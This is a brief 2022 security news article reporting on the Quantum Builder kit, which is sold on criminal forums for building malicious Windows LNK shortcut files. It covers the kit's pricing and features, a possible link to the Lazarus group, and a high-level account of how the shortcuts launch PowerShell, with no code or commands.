Creating compromised shortcuts made possible by the Quantum Builder

July 7, 2022
Creating Compromised Shortcuts Quantum Builder Malware Windows

Researchers discovered a Quantum Builder malware kit that could enable threat actors to develop malicious shortcuts or [.]LNK files. The hostile tool is sold by its developers on underground markets and cybercriminal forums.

The tool is available for lease at different prices. For a whole month of access, users will be charged about $200. The actors also offer their device for a two-month rental at $375. Additionally, some users who can pay about a thousand dollars can access the machine for half a year. Some users who also want to have permanent access to the malicious tool can pay approximately $1500.

The Quantum Builder allows users to impersonate several extensions and select 300 icons for the compromised links files. Furthermore, the tool can also support its operators for bypassing the UAC and Windows SmartScreen.

The kit can also aid several payloads per LNK file and can design ISO and HTA payloads. The initial sample of this malware kit was first discovered by researchers last May. The researchers did not immediately notice the tool since it pretended to be a harmless text file.

 

The Lazarus group might be the founder of the Quantum Builder.

 

The Quantum Builder connects with the Lazarus threat group since it overlaps some of the source codes used by the gang in its operations for disseminating payloads.

Based on reports, the LNK extension obfuscates itself behind the Windows Operating System. The extension is cleverly designed by its operators since a file name coded as “file_name[.]txt[.]lnk” will be shown as “file_name[.]text only. Thus, removing the LNK suffix from the initial display.

Due to this feature, there is a greater possibility that users will be deceived into accessing the file.

If a user runs the LNK files, it will automatically operate a PowerShell code that the threat actors can exploit to perform multiple actions. In this instance, the LNK shortcut will manage an HTML app file hosted on Quantum’s website via an authentic Windows utility.

A tool exclusively developed for creating malicious LNK files implies the surging trend of compromised LNK file usage. In addition, multiple reports said that LNK-based campaigns are getting more attention to several other threat gangs. The availability and abundance of this kit could allow additional threat actors to exploit this kind of attack soon.

About the author

Leave a Reply